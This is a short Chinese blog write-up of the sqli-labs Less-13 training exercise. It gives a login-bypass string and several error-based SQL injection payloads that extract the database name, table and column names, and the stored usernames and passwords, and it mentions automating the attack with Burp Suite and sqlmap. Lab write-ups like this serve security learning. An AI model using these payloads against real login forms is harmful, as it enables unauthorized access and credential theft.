2020.4.4 sqli-labs--第十三、十四关③

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

方法一

通过报错可知 是通过’) 闭合的
发现没有登入成功返回信息 ,看来是要盲注了

万能密码: 账号admin’)# 密码:随便

方法二:

既然它返回错误信息了,说明有回显,可以报错注入。

数据库名
uname=admin') and extractvalue(1,concat(0x7e,(select database()))) --+
表名
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
字段名
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
字段值
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3e,password) from users))) --+

在这里插入图片描述
2020.4.4 sqli-labs--第十三、十四关③_第1张图片
在这里插入图片描述

方法三

用bp抓包,将数据保存到文件中,用sqlmap。
payload和前面提交的差不多

你可能感兴趣的:(web安全)